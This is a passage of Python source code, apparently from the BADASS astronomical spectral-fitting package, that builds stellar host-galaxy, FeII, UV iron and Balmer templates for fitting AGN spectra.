if (lam_gal[0]<5100) & (lam_gal[-1]>5100):
cont_fluxes["F_CONT_TOT_5100"] = interp_tot(5100.0) #total_cont[find_nearest(lam_gal,5100.0)[1]]#
cont_fluxes["F_CONT_AGN_5100"] = interp_agn(5100.0) #agn_cont[find_nearest(lam_gal,5100.0)[1]] #
cont_fluxes["F_CONT_HOST_5100"] = interp_host(5100.0) #host_cont[find_nearest(lam_gal,5100.0)[1]] #
if (lam_gal[0]<4000) & (lam_gal[-1]>4000):
cont_fluxes["HOST_FRAC_4000"] = interp_host(4000.0)/interp_tot(4000.0) #host_cont[find_nearest(lam_gal,4000.0)[1]]/total_cont[find_nearest(lam_gal,4000.0)[1]]#
cont_fluxes["AGN_FRAC_4000"] = interp_agn(4000.0)/interp_tot(4000.0) #agn_cont[find_nearest(lam_gal,4000.0)[1]]/total_cont[find_nearest(lam_gal,4000.0)[1]] #
if (lam_gal[0]<7000) & (lam_gal[-1]>7000):
cont_fluxes["HOST_FRAC_7000"] = interp_host(7000.0)/interp_tot(7000.0) #host_cont[find_nearest(lam_gal,7000.0)[1]]/total_cont[find_nearest(lam_gal,7000.0)[1]]#
cont_fluxes["AGN_FRAC_7000"] = interp_agn(7000.0)/interp_tot(7000.0) #agn_cont[find_nearest(lam_gal,7000.0)[1]]/total_cont[find_nearest(lam_gal,7000.0)[1]] #
#
########################################################################################################
if (fit_type=='init') and (output_model==False): # For max. likelihood fitting
return gmodel, comp_dict
if (fit_type=='init') and (output_model==True): # For max. likelihood fitting
return comp_dict
elif (fit_type=='line_test'):
return comp_dict
elif (fit_type=='final') and (output_model==False): # For emcee
return gmodel, fluxes, eqwidths, cont_fluxes, int_vel_disp
elif (fit_type=='final') and (output_model==True): # output all models for best-fit model
return comp_dict
########################################################################################################
#### Host-Galaxy Template##############################################################################
def generate_host_template(lam_gal,host_options,fwhm_gal,fit_mask,velscale,verbose=True):
"""
"""
ages = np.array([0.9, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0,
9.0, 10.0, 11.0, 12.0, 13.0, 14.0],dtype=float)
temp = ["badass_data_files/eMILES/Eku1.30Zp0.06T00.0900_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.1000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.2000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.3000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.4000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.5000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.6000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.7000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.8000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T00.9000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T01.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T02.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T03.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T04.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T05.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T06.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T07.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T08.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T09.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T10.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T11.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T12.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T13.0000_iTp0.00_baseFe_linear_FWHM_variable.fits",
"badass_data_files/eMILES/Eku1.30Zp0.06T14.0000_iTp0.00_baseFe_linear_FWHM_variable.fits"
]
#
fwhm_temp = 2.51 # FWHM resolution of eMILES in Å
# Open a fits file
hdu = fits.open(temp[0])
ssp = hdu[0].data
h = hdu[0].header
hdu.close()
lam_temp = np.array(h['CRVAL1'] + h['CDELT1']*np.arange(h['NAXIS1']))
mask = ((lam_temp>=(lam_gal[0]-100.0)) & (lam_temp<=(lam_gal[-1]+100.0)))
# Apply mask and get lamRange
ssp = ssp[mask]
lam_temp = lam_temp[mask]
lamRange_temp = [np.min(lam_temp), np.max(lam_temp)]
# Create templates array
sspNew = log_rebin(lamRange_temp, ssp, velscale=velscale)[0]
templates = np.empty((sspNew.size, len(host_options["age"])))
# Variable sigma
fwhm_gal_interp = np.interp(lam_temp, lam_gal, fwhm_gal)
fwhm_dif = np.sqrt((fwhm_gal_interp**2 - fwhm_temp**2).clip(0))
sigma = fwhm_dif/2.355/h['CDELT1'] # Sigma difference in pixels
#
for j, age in enumerate(host_options["age"]):
hdu = fits.open(temp[np.where(ages==age)[0][0]])
ssp = hdu[0].data
ssp = ssp[mask]
ssp = gaussian_filter1d(ssp, sigma) # perform convolution with variable sigma
sspNew,loglam_temp,velscale_temp = log_rebin(lamRange_temp, ssp, velscale=velscale)#[0]
templates[:, j] = sspNew/np.median(sspNew) # Normalizes templates
hdu.close()
#
# Calculate npad and vsyst
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_temp[0]/lam_gal[0])*c # km/s
ssp_fft, npad = template_rfft(templates) # we will use this throughout the code
#
# Pre-convolve the templates if the velocity and dispersion are to be constant during the fit;
# this reduces the number of convolution computations during the fit.
if (host_options["vel_const"]["bool"]==True) & (host_options["disp_const"]["bool"]==True):
host_vel = host_options["vel_const"]["val"]
host_disp = host_options["disp_const"]["val"]
conv_host = convolve_gauss_hermite(ssp_fft,npad,float(velscale),\
[host_vel, host_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
host_template = conv_host
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,host_template.reshape(-1))
# plt.tight_layout()
#
# If velocity and dispersion of the host template are free parameters, then BADASS passes
# the fft of the host template(s) to the fit model for convolution during the fit.
elif (host_options["vel_const"]["bool"]==False) | (host_options["disp_const"]["bool"]==False):
host_template = (ssp_fft, npad, vsyst)
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# for i in range(np.shape(templates)[1]):
# ax1.plot(np.exp(loglam_temp),templates[:,i])
# plt.tight_layout()
#
return host_template
##################################################################################
#### Optical FeII Templates ##############################################################
def initialize_opt_feii(lam_gal, opt_feii_options, fwhm_gal,fit_mask, velscale):
"""
Generate FeII templates. Options:
'VC04' : Veron-Cetty et al. (2004) template, which utilizes a single broad
and single narrow line template with fixed relative intensities.
One can choose to fix FWHM and VOFF for each, and only vary
amplitudes (2 free parameters), or vary amplitude, FWHM, and VOFF
for each template (6 free parameters)
'K10' : Kovacevic et al. (2010) template, which treats the F, S, and G line
groups as independent templates (each amplitude is a free parameter)
and whose relative intensities are temperature dependent (1 free
parameter). There are additonal lines from IZe1 that only vary in
amplitude. All 4 line groups share the same FWHM and VOFF, for a
total of 7 free parameters. This template is only recommended
for objects with very strong FeII emission, for which the LOSVD
cannot be determined at all.
"""
if (opt_feii_options['opt_template']['type']=='VC04'):
# Load the data into Pandas DataFrames
df_br = pd.read_csv("badass_data_files/feii_templates/veron-cetty_2004/VC04_br_feii_template.csv")
df_na = pd.read_csv("badass_data_files/feii_templates/veron-cetty_2004/VC04_na_feii_template.csv")
# Generate a new grid with the original resolution, but the size of the fitting region
dlam_feii = df_br["angstrom"].to_numpy()[1]-df_br["angstrom"].to_numpy()[0] # angstroms
npad = 100 # anstroms
lam_feii = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad,dlam_feii) # angstroms
# Interpolate the original template onto the new grid
interp_ftn_br = interp1d(df_br["angstrom"].to_numpy(),df_br["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(0.0,0.0))
interp_ftn_na = interp1d(df_na["angstrom"].to_numpy(),df_na["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(0.0,0.0))
spec_feii_br = interp_ftn_br(lam_feii)
spec_feii_na = interp_ftn_na(lam_feii)
# Convolve templates to the native resolution of SDSS
fwhm_feii = 1.0 # templates were created with 1.0 FWHM resolution
fwhm_gal_interp = np.interp(lam_feii, lam_gal, fwhm_gal)
fwhm_diff = np.sqrt((fwhm_gal_interp**2 - fwhm_feii**2).clip(0))
sigma = fwhm_diff/2.3548/dlam_feii # Sigma difference in pixels
spec_feii_br = gaussian_filter1d(spec_feii_br, sigma)
spec_feii_na = gaussian_filter1d(spec_feii_na, sigma)
# log-rebin the spectrum to same velocity scale as the input galaxy
lamRange_feii = [np.min(lam_feii), np.max(lam_feii)]
spec_feii_br_new, loglam_feii, velscale_feii = log_rebin(lamRange_feii, spec_feii_br, velscale=velscale)#[0]
spec_feii_na_new, loglam_feii, velscale_feii = log_rebin(lamRange_feii, spec_feii_na, velscale=velscale)#[0]
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(np.exp(loglam_feii),spec_feii_br_new, linewidth=0.5)
# ax1.plot(np.exp(loglam_feii),spec_feii_na_new, linewidth=0.5)
# plt.tight_layout()
#
# Pre-compute FFT of templates, since they do not change (only the LOSVD and convolution changes)
br_opt_feii_fft, npad = template_rfft(spec_feii_br_new)
na_opt_feii_fft, npad = template_rfft(spec_feii_na_new)
# The FeII templates are offset from the input galaxy spectrum by 100 A, so we
# shift the spectrum to match that of the input galaxy.
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_feii[0]/lam_gal[0])*c
# If opt_fwhm_const=True AND opt_voff_const=True, we preconvolve the templates so we don't have to
# during the fit
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
br_fwhm = opt_feii_options["opt_fwhm_const"]["br_opt_feii_val"]
na_fwhm = opt_feii_options["opt_fwhm_const"]["na_opt_feii_val"]
#
br_voff = opt_feii_options["opt_voff_const"]["br_opt_feii_val"]
na_voff = opt_feii_options["opt_voff_const"]["na_opt_feii_val"]
#
br_conv_temp = convolve_gauss_hermite(br_opt_feii_fft, npad, float(velscale),\
[br_voff, br_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
na_conv_temp = convolve_gauss_hermite(na_opt_feii_fft, npad, float(velscale),\
[na_voff, na_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
#
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,br_conv_temp, linewidth=0.5)
# ax1.plot(lam_gal,na_conv_temp, linewidth=0.5)
# plt.tight_layout()
#
opt_feii_templates = (br_conv_temp, na_conv_temp)
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
# We return a tuple consisting of the FFT of the broad and narrow templates, npad, and vsyst,
# which are needed for the convolution.
opt_feii_templates =(br_opt_feii_fft, na_opt_feii_fft, npad, vsyst)
return opt_feii_templates
elif (opt_feii_options['opt_template']['type']=='K10'):
# The procedure for the K10 templates is slightly difference since their relative intensities
# are temperature dependent. We must create a Gaussian emission line for each individual line,
# and store them as an array, for each of the F, S, G, and Z transitions. We treat each transition
# as a group of templates, which will be convolved together, but relative intensities will be calculated
# for separately.
def gaussian_angstroms(x, center, amp, fwhm, voff):
sigma = fwhm/2.3548
x = x.reshape((len(x),1))
g = amp*np.exp(-0.5*(x-(center))**2/(sigma)**2) # construct gaussian
g = np.sum(g,axis=1)
# Normalize to 1
# g = g/np.max(g)
# Make sure edges of gaussian are zero to avoid wierd things
# g[g<1.0e-6] = 0.0
# Replace the ends with the same value
g[0] = g[1]
g[-1] = g[-2]
return g
#
# Read in template data
F_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_F_transitions.csv')
S_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_S_transitions.csv')
G_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_G_transitions.csv')
Z_trans_df = pd.read_csv('badass_data_files/feii_templates/kovacevic_2010/K10_Z_transitions.csv')
# Generate a high-resolution wavelength scale that is universal to all transitions
fwhm = 1.0 # Angstroms
dlam_feii = 0.1 # linear spacing in Angstroms
npad = 100
lam_feii = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad, dlam_feii)
lamRange_feii = [np.min(lam_feii), np.max(lam_feii)]
# Get size of output log-rebinned spectrum
F = gaussian_angstroms(lam_feii, F_trans_df["wavelength"].to_numpy()[0], 1.0, fwhm, 0.0)
new_size, loglam_feii, velscale_feii = log_rebin(lamRange_feii, F, velscale=velscale)
# Create storage arrays for each emission line of each transition
F_templates = np.empty(( len(new_size), len(F_trans_df['wavelength'].to_numpy()) ))
S_templates = np.empty(( len(new_size), len(S_trans_df['wavelength'].to_numpy()) ))
G_templates = np.empty(( len(new_size), len(G_trans_df['wavelength'].to_numpy()) ))
Z_templates = np.empty(( len(new_size), len(Z_trans_df['wavelength'].to_numpy()) ))
# Generate templates with a amplitude of 1.0
for i in range(np.shape(F_templates)[1]):
F = gaussian_angstroms(lam_feii, F_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_F = log_rebin(lamRange_feii, F, velscale=velscale)[0]
F_templates[:,i] = new_F/np.max(new_F)
for i in range(np.shape(S_templates)[1]):
S = gaussian_angstroms(lam_feii, S_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_S = log_rebin(lamRange_feii, S, velscale=velscale)[0]
S_templates[:,i] = new_S/np.max(new_S)
for i in range(np.shape(G_templates)[1]):
G = gaussian_angstroms(lam_feii, G_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_G = log_rebin(lamRange_feii, G, velscale=velscale)[0]
G_templates[:,i] = new_G/np.max(new_G)
for i in range(np.shape(Z_templates)[1]):
Z = gaussian_angstroms(lam_feii, Z_trans_df["wavelength"].to_numpy()[i], 1.0, fwhm, 0.0)
new_Z = log_rebin(lamRange_feii, Z, velscale=velscale)[0]
Z_templates[:,i] = new_Z/np.max(new_Z)
# Pre-compute the FFT for each transition
F_trans_fft, F_trans_npad = template_rfft(F_templates)
S_trans_fft, S_trans_npad = template_rfft(S_templates)
G_trans_fft, G_trans_npad = template_rfft(G_templates)
Z_trans_fft, Z_trans_npad = template_rfft(Z_templates)
npad = F_trans_npad
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_feii[0]/lam_gal[0])*c
# If opt_fwhm_const=True AND opt_voff_const=True, we preconvolve the templates so we don't have to
# during the fit
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
feii_fwhm = opt_feii_options["opt_fwhm_const"]["opt_feii_val"]
#
feii_voff = opt_feii_options["opt_voff_const"]["opt_feii_val"]
#
f_conv_temp = convolve_gauss_hermite(F_trans_fft, F_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
s_conv_temp = convolve_gauss_hermite(S_trans_fft, S_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
g_conv_temp = convolve_gauss_hermite(G_trans_fft, G_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
z_conv_temp = convolve_gauss_hermite(Z_trans_fft, Z_trans_npad, float(velscale),\
[feii_voff, feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
#
opt_feii_templates = (f_conv_temp, F_trans_df['wavelength'].to_numpy() ,F_trans_df['gf'].to_numpy(), F_trans_df['E2_J'].to_numpy(),
s_conv_temp, S_trans_df['wavelength'].to_numpy() ,S_trans_df['gf'].to_numpy(), S_trans_df['E2_J'].to_numpy(),
g_conv_temp, G_trans_df['wavelength'].to_numpy() ,G_trans_df['gf'].to_numpy(), G_trans_df['E2_J'].to_numpy(),
z_conv_temp, Z_trans_df['rel_int'].to_numpy()
)
#
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
opt_feii_templates = (F_trans_fft, F_trans_df['wavelength'].to_numpy() ,F_trans_df['gf'].to_numpy(), F_trans_df['E2_J'].to_numpy(),
S_trans_fft, S_trans_df['wavelength'].to_numpy() ,S_trans_df['gf'].to_numpy(), S_trans_df['E2_J'].to_numpy(),
G_trans_fft, G_trans_df['wavelength'].to_numpy() ,G_trans_df['gf'].to_numpy(), G_trans_df['E2_J'].to_numpy(),
Z_trans_fft, Z_trans_df['rel_int'].to_numpy(),
npad, vsyst
)
# Return a list of arrays which will be unpacked during the fitting process
return opt_feii_templates
#### Optical FeII Template #########################################################
def VC04_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale):
# Unpack opt_feii_templates
# Parse FeII options
#
if (opt_feii_options['opt_amp_const']['bool']==False): # if amp not constant
na_opt_feii_amp = p['NA_OPT_FEII_AMP']
br_opt_feii_amp = p['BR_OPT_FEII_AMP']
elif (opt_feii_options['opt_amp_const']['bool']==True): # if amp constant
na_opt_feii_amp = opt_feii_options['opt_amp_const']['na_opt_feii_val']
br_opt_feii_amp = opt_feii_options['opt_amp_const']['br_opt_feii_val']
#
if (opt_feii_options['opt_fwhm_const']['bool']==False): # if amp not constant
na_opt_feii_fwhm = p['NA_OPT_FEII_FWHM']
br_opt_feii_fwhm = p['BR_OPT_FEII_FWHM']
elif (opt_feii_options['opt_fwhm_const']['bool']==True): # if amp constant
na_opt_feii_fwhm = opt_feii_options['opt_fwhm_const']['na_opt_feii_val']
br_opt_feii_fwhm = opt_feii_options['opt_fwhm_const']['br_opt_feii_val']
if na_opt_feii_fwhm<=0.01: na_opt_feii_fwhm = 0.01
if br_opt_feii_fwhm<=0.01: br_opt_feii_fwhm = 0.01
#
if (opt_feii_options['opt_voff_const']['bool']==False): # if amp not constant
na_opt_feii_voff = p['NA_OPT_FEII_VOFF']
br_opt_feii_voff = p['BR_OPT_FEII_VOFF']
elif (opt_feii_options['opt_voff_const']['bool']==True): # if amp constant
na_opt_feii_voff = opt_feii_options['opt_voff_const']['na_opt_feii_val']
br_opt_feii_voff = opt_feii_options['opt_voff_const']['br_opt_feii_val']
#
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
br_conv_temp, na_conv_temp = opt_feii_templates
# Templates are already convolved so just normalize and multiplfy by amplitude
# br_opt_feii_template = br_conv_temp/np.max(br_conv_temp) * br_opt_feii_amp
# na_opt_feii_template = na_conv_temp/np.max(na_conv_temp) * na_opt_feii_amp
br_opt_feii_template = br_conv_temp * br_opt_feii_amp
na_opt_feii_template = na_conv_temp * na_opt_feii_amp
br_opt_feii_template = br_opt_feii_template.reshape(-1)
na_opt_feii_template = na_opt_feii_template.reshape(-1)
# Set fitting region outside of template to zero to prevent convolution loops
br_opt_feii_template[(lam_gal < 3400) & (lam_gal > 7200)] = 0
na_opt_feii_template[(lam_gal < 3400) & (lam_gal > 7200)] = 0
#
# print(br_opt_feii_amp,na_opt_feii_amp)
# fig = plt.figure(figsize=(18,7))
# ax1 = fig.add_subplot(1,1,1)
# ax1.plot(lam_gal,na_opt_feii_template, linewidth=0.5)
# ax1.plot(lam_gal,br_opt_feii_template, linewidth=0.5)
# plt.tight_layout()
# sys.exit()
#
elif (opt_feii_options["opt_fwhm_const"]["bool"]==False) | (opt_feii_options["opt_voff_const"]["bool"]==False):
br_opt_feii_fft, na_opt_feii_fft, npad, vsyst = opt_feii_templates
br_conv_temp = convolve_gauss_hermite(br_opt_feii_fft, npad, float(velscale),
[br_opt_feii_voff, br_opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
#
na_conv_temp = convolve_gauss_hermite(na_opt_feii_fft, npad, float(velscale),
[na_opt_feii_voff, na_opt_feii_fwhm/2.3548], lam_gal.shape[0],
velscale_ratio=1, sigma_diff=0, vsyst=vsyst)
# Re-normalize to 1
# br_conv_temp = br_conv_temp/np.max(br_conv_temp)
# na_conv_temp = na_conv_temp/np.max(na_conv_temp)
# Multiplyy by amplitude
br_opt_feii_template = br_opt_feii_amp * br_conv_temp
na_opt_feii_template = na_opt_feii_amp * na_conv_temp
# Reshape
br_opt_feii_template = br_opt_feii_template.reshape(-1)
na_opt_feii_template = na_opt_feii_template.reshape(-1)
# Set fitting region outside of template to zero to prevent convolution loops
br_opt_feii_template[(lam_gal < 3400) & (lam_gal > 7200)] = 0
na_opt_feii_template[(lam_gal < 3400) & (lam_gal > 7200)] = 0
return br_opt_feii_template, na_opt_feii_template
####################################################################################
#### UV Iron Template ##############################################################
def initialize_uv_iron(lam_gal, feii_options, fwhm_gal,fit_mask, velscale):
"""
Generate UV Iron template.
"""
# Load the data into Pandas DataFrames
# df_uviron = pd.read_csv("badass_data_files/feii_templates/vestergaard-wilkes_2001/VW01_UV_B_47_191.csv") # UV B+47+191
df_uviron = pd.read_csv("badass_data_files/feii_templates/vestergaard-wilkes_2001/VW01_UV_B.csv") # UV B only
# Generate a new grid with the original resolution, but the size of the fitting region
dlam_uviron = df_uviron["angstrom"].to_numpy()[1]-df_uviron["angstrom"].to_numpy()[0] # angstroms
npad = 100 # anstroms
lam_uviron = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad,dlam_uviron) # angstroms
# Interpolate the original template onto the new grid
interp_ftn_uv = interp1d(df_uviron["angstrom"].to_numpy(),df_uviron["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
spec_uviron = interp_ftn_uv(lam_uviron)
# log-rebin the spectrum to same velocity scale as the input galaxy
lamRange_uviron = [np.min(lam_uviron), np.max(lam_uviron)]
spec_uviron_new, loglam_uviron, velscale_uviron = log_rebin(lamRange_uviron, spec_uviron, velscale=velscale)#[0]
# Pre-compute FFT of templates, since they do not change (only the LOSVD and convolution changes)
uv_iron_fft, npad = template_rfft(spec_uviron_new)
# The FeII templates are offset from the input galaxy spectrum by 100 A, so we
# shift the spectrum to match that of the input galaxy.
c = 299792.458 # speed of light in km/s
vsyst = np.log(lam_uviron[0]/lam_gal[0])*c
# We return a tuple consisting of the FFT of the broad and narrow templates, npad, and vsyst,
# which are needed for the convolution.
return (uv_iron_fft, npad, vsyst)
####################################################################################
#### Balmer Template ###############################################################
def initialize_balmer(lam_gal, balmer_options, fwhm_gal,fit_mask, velscale):
# Import the template for the higher-order balmer lines (7 <= n <= 500)
# df = pd.read_csv("badass_data_files/balmer_template/higher_order_balmer.csv")
df = pd.read_csv("badass_data_files/balmer_template/higher_order_balmer_n8_500.csv")
# Generate a new grid with the original resolution, but the size of the fitting region
dlam_balmer = df["angstrom"].to_numpy()[1]-df["angstrom"].to_numpy()[0] # angstroms
npad = 100 # angstroms
lam_balmer = np.arange(np.min(lam_gal)-npad, np.max(lam_gal)+npad,dlam_balmer) # angstroms
# Interpolate the original template onto the new grid
interp_ftn_balmer = interp1d(df["angstrom"].to_numpy(),df["flux"].to_numpy(),kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
spec_high_balmer = interp_ftn_balmer(lam_balmer)
# Calculate the difference in instrumental dispersion between SDSS and the template
lamRange_balmer = [np.min(lam_balmer), np.max(lam_balmer)]
fwhm_balmer = 1.0
fwhm_gal_interp = np.interp(lam_balmer, lam_gal, fwhm_gal)
fwhm_diff = np.sqrt((fwhm_gal_interp**2 - fwhm_balmer**2).clip(0))
sigma = fwhm_diff/2.3548/dlam_balmer # Sigma difference in pixels
# Convolve the FeII templates to the SDSS resolution
spec_high_balmer = gaussian_filter1d(spec_high_balmer, sigma)
# Log-rebin to same velocity scale as galaxy
spec_high_balmer_new, loglam_balmer, velscale_balmer = log_rebin(lamRange_balmer, spec_high_balmer, velscale=velscale)#[0]
if (np.sum(spec_high_balmer_new)>0):
# Normalize to 1
spec_high_balmer_new = spec_high_balmer_new/np.max(spec_high_balmer_new)
# Package the wavelength vector and template
balmer_template = (np.exp(loglam_balmer), spec_high_balmer_new, velscale_balmer)
return balmer_template
####################################################################################
def get_fwhm_res(fwhm_gal_ftn,line_center,line_voff):
c = 299792.458
fwhm_res = (fwhm_gal_ftn(line_center +
(line_voff*line_center/c))/(line_center +
(line_voff*line_center/c))*c)
return fwhm_res
####################################################################################
def K10_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale):
"""
Constructs an Kovacevic et al. 2010 FeII template using a series of Gaussians and ensures
no lines are created at the edges of the fitting region.
"""
# Parse FeII options
if (opt_feii_options['opt_amp_const']['bool']==False): # if amp not constant
f_feii_amp = p['OPT_FEII_F_AMP']
s_feii_amp = p['OPT_FEII_S_AMP']
g_feii_amp = p['OPT_FEII_G_AMP']
z_feii_amp = p['OPT_FEII_Z_AMP']
elif (opt_feii_options['opt_amp_const']['bool']==True): # if amp constant
f_feii_amp = opt_feii_options['opt_amp_const']['f_feii_val']
s_feii_amp = opt_feii_options['opt_amp_const']['s_feii_val']
g_feii_amp = opt_feii_options['opt_amp_const']['g_feii_val']
z_feii_amp = opt_feii_options['opt_amp_const']['z_feii_val']
#
if (opt_feii_options['opt_fwhm_const']['bool']==False): # if fwhm not constant
opt_feii_fwhm = p['OPT_FEII_FWHM']
elif (opt_feii_options['opt_fwhm_const']['bool']==True): # if fwhm constant
opt_feii_fwhm = opt_feii_options['opt_fwhm_const']['opt_feii_val']
if opt_feii_fwhm<= 0.01: opt_feii_fwhm = 0.01
#
if (opt_feii_options['opt_voff_const']['bool']==False): # if voff not constant
opt_feii_voff = p['OPT_FEII_VOFF']
elif (opt_feii_options['opt_voff_const']['bool']==True): # if voff constant
opt_feii_voff = opt_feii_options['opt_voff_const']['opt_feii_val']
#
if (opt_feii_options['opt_temp_const']['bool']==False): # if temp not constant
opt_feii_temp = p['OPT_FEII_TEMP']
elif (opt_feii_options['opt_temp_const']['bool']==True): # if temp constant
opt_feii_temp = opt_feii_options['opt_temp_const']['opt_feii_val']
if (opt_feii_options["opt_fwhm_const"]["bool"]==True) & (opt_feii_options["opt_voff_const"]["bool"]==True):
#
# Unpack tables for each template
f_conv_temp, f_feii_center, f_feii_gf, f_feii_e2 = (opt_feii_templates[0], opt_feii_templates[1], opt_feii_templates[2], opt_feii_templates[3])
s_conv_temp, s_feii_center, s_feii_gf, s_feii_e2 = (opt_feii_templates[4], opt_feii_templates[5], opt_feii_templates[6], opt_feii_templates[7])
g_conv_temp, g_feii_center, g_feii_gf, g_feii_e2 = (opt_feii_templates[8], opt_feii_templates[9], opt_feii_templates[10], opt_feii_templates[11])
z_conv_temp, z_feii_rel_int = (opt_feii_templates[12], opt_feii_templates[13])
# F-template
# Normalize amplitudes to 1
f_norm = np.array([np.max(f_conv_temp[:,i]) for i in range(np.shape(f_conv_temp)[1])])
f_norm[f_norm<1.e-6] = 1.0
f_conv_temp = f_conv_temp/f_norm
# Calculate temperature dependent relative intensities
f_feii_rel_int = calculate_k10_rel_int("F",f_feii_center, f_feii_gf, f_feii_e2, f_feii_amp, opt_feii_temp)
# Multiply by relative intensities
f_conv_temp = f_conv_temp * f_feii_rel_int
# Sum templates along rows
f_template = np.sum(f_conv_temp, axis=1)
f_template[(lam_gal <4472) & (lam_gal >5147)] = 0
# S-template
# Normalize amplitudes to 1
s_norm = np.array([np.max(s_conv_temp[:,i]) for i in range(np.shape(s_conv_temp)[1])])
s_norm[s_norm<1.e-6] = 1.0
s_conv_temp = s_conv_temp/s_norm
# Calculate temperature dependent relative intensities
s_feii_rel_int = calculate_k10_rel_int("S",s_feii_center, s_feii_gf, s_feii_e2, s_feii_amp, opt_feii_temp)
# Multiply by relative intensities
s_conv_temp = s_conv_temp * s_feii_rel_int
# Sum templates along rows
s_template = np.sum(s_conv_temp, axis=1)
s_template[(lam_gal <4731) & (lam_gal >5285)] = 0
# G-template
# Normalize amplitudes to 1
g_norm = np.array([np.max(g_conv_temp[:,i]) for i in range(np.shape(g_conv_temp)[1])])
g_norm[g_norm<1.e-6] = 1.0
g_conv_temp = g_conv_temp/g_norm
# Calculate temperature dependent relative intensities
g_feii_rel_int = calculate_k10_rel_int("G",g_feii_center, g_feii_gf, g_feii_e2, g_feii_amp, opt_feii_temp)
# Multiply by relative intensities
g_conv_temp = g_conv_temp * g_feii_rel_int
